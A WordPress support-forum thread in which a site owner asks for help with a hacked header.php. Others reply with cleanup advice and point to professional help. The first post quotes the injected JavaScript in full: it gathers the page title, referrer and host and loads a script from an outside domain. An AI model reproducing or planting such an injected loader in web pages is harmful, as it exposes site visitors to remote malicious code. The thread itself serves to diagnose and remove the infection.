header.php was hacked

  • kamikezo

    (@kamikezo)


    10 years, 5 months ago

    Hi,any help would greatly appreciated..
    Hacker injects this code “<script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “http://osteria-salvatore.de/js/jquery.min.php&#8221;; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>” just before the </head> in header.php. even after removing the code the hacker somehow can still insert the code again.

    is there any way to stop the php files or atleast the header.php from editing? already tried changing file permission (to 444) via ftp but i cant, it keeps coming back to 644

    i need help, thanks in advance

Viewing 7 replies - 1 through 7 (of 7 total)
  • Geoffrey Shilling

    (@geoffreyshilling)

    Volunteer Moderator

    10 years, 5 months ago

    I would recommend you carefully follow this guide to make sure your site is all cleaned up from the hack. There could be something else hiding somewhere, allowing this code to be re-inserted like it is.

    When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Digico Paris

    (@digico-paris)

    10 years, 5 months ago

    Hello, I suggest this:

    1) make a full backup of your WP (files + database)
    2) delete all themes but one, and plugins folder, and see if it solves issue
    3) in last case scenarios, the file is in your theme / plugin folder

    And yes, you did well trying to put the file in chmod 444, but, sometimes you must grab files directly by ssh or so. It seems one plugin grabbed it, but you can over-rule it by FTPS or SSH (better).

    Like many malware it probably incrusted a script in functions.php so the best is to fully delete theme, try an offical theme for example.

    While testing where does this js comes from, i bet 10 € on functions.php, calling a strange unallowed js outside of your webserver :p

    Hope it helps,

    Thread Starter kamikezo

    (@kamikezo)

    10 years, 5 months ago

    thanks for the replies, im afraid i need more option. already tried them with no luck

    Moderator James Huff

    (@macmanx)

    10 years, 5 months ago

    If the guide linked to earlier didn’t help, I’d have to suggest hiring a specialist to investigate and clean it up, as investigating and cleaning will be a very involved process. The guide will walk you through all of that, but you have to do *all* of it.

    You have to make sure that you’ve cleaned the vector along with symptoms, or they’ll just re-do the hack.

    Please try http://jobs.wordpress.net/ or http://directory.codepoet.com/ and do not accept any hire or direct access offers posted to these forums.

    Alternatively, https://sucuri.net/ and https://vaultpress.com/ offer services specific to hack cleanup and have great standing in the community.

    Thread Starter kamikezo

    (@kamikezo)

    10 years, 5 months ago

    i guess ill just have to hire someone to clean my site, thanks for all the help

    Moderator James Huff

    (@macmanx)

    10 years, 5 months ago

    You’re welcome!

    Digico Paris

    (@digico-paris)

    10 years, 5 months ago

    +1 you’re welcome, like James said it’s sometimes best to hire a good local freelancer than being stucked with problems like yours.

    Happy new year by the way, James, and all.

Viewing 7 replies - 1 through 7 (of 7 total)

The topic ‘header.php was hacked’ is closed to new replies.